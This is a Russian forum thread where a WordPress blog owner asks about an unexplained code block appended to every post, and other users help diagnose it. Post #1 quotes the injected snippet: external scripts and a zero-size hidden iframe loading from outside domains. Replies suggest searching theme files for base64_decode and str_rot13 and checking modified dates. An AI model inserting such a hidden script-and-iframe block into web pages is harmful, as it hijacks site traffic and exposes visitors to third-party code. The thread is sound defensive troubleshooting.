X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость (

| Вход | Регистрация )

4 страниц V   1 2 3 4 >
Открыть тему
Тема закрыта
> Что-то странное с блогом wordpress, автоматически добавляется "что-то" к каждому посту в конце
Stila
Stila
Topic Starter сообщение 27.9.2013, 18:31; Ответить: Stila
Сообщение #1


Здравствуйте

После каждого поста автоматически начал добавляться такой блок:

<script type="text/javascript" src="https://pluginplus.net/plugins/system/system_im.js"></script>
<iframe style="width: 0px; height: 0px; border: 0px none;" src="https://pluginplus.net/statistica/statistic_li.html"></iframe>
<script type="text/javascript" src="http://c.am15.net/preloader7.js"></script>
<div id="advm_video"></div>
<div>
<div id="advm_block" style="display: none;">
<div id="advm_close">Закрыть [Х]</div>
<div id="ambn17757"></div>
<div id="advm_box">
<div>Осталосьсек.</div>
</div>
</div>
</div>

Виден только в админке

Что это? unsure.gif
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
paranormal
paranormal
сообщение 27.9.2013, 18:39; Ответить: paranormal
Сообщение #2


Прямо в тело статьи добавляется?

(Stila @ 27.9.2013, 17:31) *
<div id="advm_block" style="display: none;">


Поэтому и не видно.


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Stila
Stila
Topic Starter сообщение 27.9.2013, 18:46; Ответить: Stila
Сообщение #3


paranormal, да. Внизу sad.gif

его и не должно быть видно. Я даже не знаю что это)
Какие-то плагины для видео были активны- удалила. Все равно это появляется сразу после публикации
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
paranormal
paranormal
сообщение 27.9.2013, 18:48; Ответить: paranormal
Сообщение #4


Смените на время тему на стандартную и посмотрите, будет ли в новом посте или нет. Если нет, то значит надо искать бяку в файлах темы (single.php functions.php как правило).


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Stila
Stila
Topic Starter сообщение 27.9.2013, 18:50; Ответить: Stila
Сообщение #5


paranormal, Спасибо smile.gif Буду пробовать ночью, когда активность поменьше.
Надеюсь, что найдется

А что это за сайт pluginplus.net ?)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
DeXtR
DeXtR
сообщение 27.9.2013, 19:08; Ответить: DeXtR
Сообщение #6


(Stila @ 27.9.2013, 17:50) *
pluginplus.net/plugins/system/system_im.js


Судя по
http://pluginplus.net/plugins/system/system_im.js и
http://jsc.dt00.net/k/i/kinodrug.net.42659.js

подключаются блоки маркетгида, затем на них сливается часть траффика, через какую-то уязвимость.
где-то на ачате недавно писали про этот метод sleep.gif


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Electric
Electric
сообщение 28.9.2013, 11:04; Ответить: Electric
Сообщение #7


Проверяйте темы на наличия бяк. Возможно уже гдето запихнули шелл и через него вам исправили файлы движка.
Например поищите хотя бы base64_decode и str_rot13 в файлах.


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Stila
Stila
Topic Starter сообщение 28.9.2013, 14:41; Ответить: Stila
Сообщение #8


Electric, что это? cry.gif Я обязательно поищу в гугле, но даже не знаю что в поиске набирать)))
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Electric
Electric
сообщение 28.9.2013, 14:54; Ответить: Electric
Сообщение #9


Stila, искать не в поисковие а по файлах сайта по фтп, указанные фразы...
Если сами е разберетесь - пишите в АСЬку, будем смотреть...


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
BRONX
BRONX
сообщение 28.9.2013, 16:03; Ответить: BRONX
Сообщение #10


(Electric @ 28.9.2013, 12:54) *
lectric, что это? Я обязательно поищу в гугле, но даже не знаю что в поиске набирать)))


Да и не мешало бы, все в том же ftp, посмотреть у каких файлов/директорий поменялась дата.
Самый верный способ узнать в какие файлы внесли вредоносный скрипт


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
4 страниц V   1 2 3 4 >
Открыть тему
Тема закрыта
3 чел. читают эту тему (гостей: 3, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлыВо что Вы играете?
400 Vmir 67985 20.4.2024, 18:39
автор: SaintExchange
Горячая тема (нет новых ответов) Во что сегодня инвестировать?
Делимся своими приносящими прибыль вариантами
76 traveliver 5095 20.4.2024, 18:27
автор: SaintExchange
Открытая тема (нет новых ответов) Тема имеет прикрепленные файлыПродам базу сайтов Wordpress в 16 миллионов доменов! Свежая сборка.
19 Boymaster 11430 20.4.2024, 0:01
автор: Boymaster
Открытая тема (нет новых ответов) Нужен кодер, чтобы пофиксить ошибку Wordpress после переноса сайта
0 Alex-777 955 7.4.2024, 18:05
автор: Alex-777
Открытая тема (нет новых ответов) Перенос сайта на CMS Wordpress
8 freeax 4984 10.3.2024, 14:58
автор: freeax


 



RSS Текстовая версия Сейчас: 25.4.2024, 14:52
Дизайн